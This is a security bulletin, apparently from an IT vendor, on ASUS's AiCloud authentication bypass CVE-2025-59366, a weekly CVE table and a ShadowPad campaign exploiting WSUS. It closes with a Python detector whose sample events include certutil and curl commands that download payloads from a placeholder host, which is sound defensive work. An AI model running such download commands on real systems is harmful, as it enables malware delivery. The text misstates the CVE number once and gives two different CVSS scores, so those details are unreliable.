ASUS warns of a critical authentication vulnerability in AiCloud routers.
Severity: CRITICAL (CVE-2025-59366)
CVSS v4.0 Score: 9.2

Information
ASUS AiCloud is a personal cloud service that lets you connect to and access your data anytime, anywhere by turning your ASUS router into a personal cloud server. It works with USB storage devices connected to the router to stream files, back up data, and share files via the AiCloud mobile app (iOS/Android) or through a web link.
Incident
CVE-2025-59366 is an authentication bypass vulnerability in AiCloud. This flaw may be caused by an unintended side effect of the Samba function, which could allow certain features to be accessed without proper authorization.
ASUS has released new firmware to fix nine security vulnerabilities, including a critical authentication bypass in routers with AiCloud enabled. AiCloud is a remote cloud access feature included in many ASUS routers, which turns the routers into personal cloud servers for remote media streaming and cloud-based data storage.
According to ASUS, the CVE-2025-59366 vulnerability may result from unintended side effects of Samba functionality, potentially allowing unauthorized actions. A remote, unauthenticated attacker can exploit this flaw through path traversal and OS command injection attacks. These attack methods are low complexity and do not require user interaction.
Although there are currently no reports of active exploitation of CVE-2025-2492, such attacks are commonly used to install malware or enlist devices into botnets for DDoS attacks. Therefore, ASUS router users are strongly advised to upgrade to the latest firmware as soon as possible.
Recommendation
It is recommended to update your router to the latest released firmware.

Security systems are important. We must stay vigilant and monitor them as usual.
For more information, please contact:
Email: sales@inetms.co.th
065 149 2822 (Ms. Suphatson)
063 204 4534 (Ms. Atsamaphorn)
065 929 6330 (Ms. Kansinee)
061 387 9439 (Ms. Sirilak)
092 257 6902 (Ms. Narusorn)
063 197 7510 (Mr. Yanotai)
065 725 7405 (Ms. Nattharini)
References
Weekly Interesting CVE
| NO. | CVE Name | Published Date | Last Update | Device/Application/OS Target | Attack Type | CVSS | Detail | Solution | Reference |
|---|---|---|---|---|---|---|---|---|---|
| 1 | CVE-2025-13597 | 25/11/2025 | 25/11/2025 | AI Feeds Plugin for WordPress <= 1.0.11 | Arbitrary File Upload / Remote Code Execution (RCE) | 9.8 | Unauthenticated attackers can exploit the actualizador_git.php file to download arbitrary GitHub repositories and overwrite existing plugin files. This allows for the injection of malicious scripts, leading to Remote Code Execution (RCE) and full website compromise. | Update the AI Feeds plugin to the latest version (newer than 1.0.11) or uninstall it immediately if no patch is available. | |
| 2 | CVE-2025-59366 | 25/11/2025 | 25/11/2025 | ASUS Router Firmware (AiCloud feature) | Authentication Bypass | 10.0 | (Critical Auth Bypass) This vulnerability arises from Samba functionality, allowing attackers to bypass authentication and access critical router functions without logging in. If the feature is enabled, it can lead to full device control or unauthorized access to AiCloud data. | Update to the latest firmware or temporarily disable the AiCloud feature. | |
| 3 | CVE-2025-12977 | 24/11/2025 | 25/11/2025 | Fluent Bit (Input Plugins: in_http, in_splunk, in_elasticsearch) | Path Traversal / Arbitrary File Write | 8.7 | Attackers can compromise log data integrity via Path Traversal in the tag_key parameter. This enables Arbitrary File Write, allowing attackers to overwrite critical files or configurations, which may escalate to Remote Code Execution (RCE). Additionally, it allows for log misrouting or log injection. | Update Fluent Bit to version 4.1.0 or later and ensure strict input validation for the tag_key parameter. | https://www.cvedetails.com/cve/CVE-2025-12977/ |
| 4 | CVE-2025-62691 | 25/11/2025 | 25/11/2025 | MaLion (Windows) < 7.1.1.9, MaLionCloud < 7.2.0.1 | Stack-based Buffer Overflow (RCE) | 5.3 | Attackers can send a specially crafted HTTP request to trigger a Buffer Overflow. This allows for unauthenticated remote code execution (RCE) with SYSTEM privileges, potentially leading to full system compromise. | Update MaLion Security Point (Windows) to version 7.1.1.9 or later, and MaLionCloud to version 7.2.0.1 or later. | |
| 5 | CVE-2024-47856 | 24/11/2025 | 25/11/2025 | RSA Authentication Agent for Microsoft Windows < 7.4.7 | Path Interception / Unquoted Service Path | 9.2 | (Local Privilege Escalation) The vulnerability is caused by an unquoted service path in the Agent, which may lead Windows to execute an unintended executable. Attackers can exploit this by placing a malicious file in the path to execute code with SYSTEM privileges. | Update to RSA Authentication Agent version 7.4.7 or later. | https://nvd.nist.gov/vuln/detail/CVE-2024-47856 |
Malware News or Campaign IOC/IOA
| No | Campaign Name | Detection Date | Attack Type | Description | Mitigation/Remediation |
|---|---|---|---|---|---|
| 1 | ShadowPad Malware Actively Exploits WSUS Vulnerability for Full System Access | 24/11/2025 | Remote Code Execution | Hackers are reportedly exploiting a critical vulnerability in Windows Server Update Services (WSUS) to continue distributing the ShadowPad malware. This follows the release of a proof-of-concept (PoC) exploit for the vulnerability tracked as CVE-2025-59287, which allows attackers to “execute arbitrary code on a machine,” giving them complete control over the server if Microsoft’s recently released patch has not been applied. Once compromised, hackers use PowerShell to gain control over the machine and then download the ShadowPad malware using commands such as certutil and curl. ShadowPad is a highly sophisticated backdoor capable of evading detection and remaining hidden on the machine; it uses DLL side-loading to disguise itself as a legitimate file. Worryingly, this malware is linked to state-sponsored hacking groups and is commonly used to target large organizations, particularly critical infrastructure. Experts warn that the number of attacks has increased rapidly since the PoC was released, and the severity is expected to keep rising unless organizations promptly patch their WSUS systems. | |
Ref: https://thehackernews.com/2025/11/shadowpad-malware-actively-exploits.html
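As an added detection example (not from this bulletin or from any vendor), the following Python flags process-creation events in which PowerShell launches certutil or curl with a remote URL, the download step the ShadowPad description above mentions. The events are constructed samples; the Sysmon-style field names and the placeholder host in the URLs are assumptions.

```python
import re

# Constructed sample process-creation events (Sysmon-style field names are an
# assumption); the URL host is a placeholder, not a real indicator.
SAMPLE_EVENTS = [
    {"host": "wsus01", "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil.exe -urlcache -f http://files.example.invalid/up.dat C:\ProgramData\up.dat"},
    {"host": "wsus01", "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Windows\System32\curl.exe",
     "cmdline": r"curl.exe -o C:\ProgramData\svc.dll http://files.example.invalid/svc.dll"},
    {"host": "wsus01", "parent": r"C:\Windows\System32\services.exe",
     "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil.exe -verify C:\certs\server.cer"},
    {"host": "ws05", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\curl.exe",
     "cmdline": "curl.exe --version"},
]

SHELLS = {"powershell.exe", "pwsh.exe"}      # shell parents seen in the chain
DOWNLOADERS = {"certutil.exe", "curl.exe"}   # the two tools named in the bulletin
URL_RE = re.compile(r"https?://", re.IGNORECASE)

def basename(path: str) -> str:
    """Return the lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def is_suspicious(event: dict) -> bool:
    """True when a shell spawns certutil/curl to fetch a remote URL."""
    if basename(event["parent"]) not in SHELLS:
        return False
    image = basename(event["image"])
    if image not in DOWNLOADERS:
        return False
    cmd = event["cmdline"]
    if not URL_RE.search(cmd):
        return False
    # certutil only downloads with -urlcache; a URL in any other mode is not a fetch
    if image == "certutil.exe" and "urlcache" not in cmd.lower():
        return False
    return True

def find_suspicious(events: list) -> list:
    """Return the events that match the download pattern, for alerting."""
    return [e for e in events if is_suspicious(e)]

if __name__ == "__main__":
    for e in find_suspicious(SAMPLE_EVENTS):
        print(f"[ALERT] {e['host']}: {basename(e['parent'])} -> {e['cmdline']}")
```

On a real WSUS server the same logic can be scoped further by restricting the parent to processes descended from the WSUS service or its IIS application pool.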
09 December 2025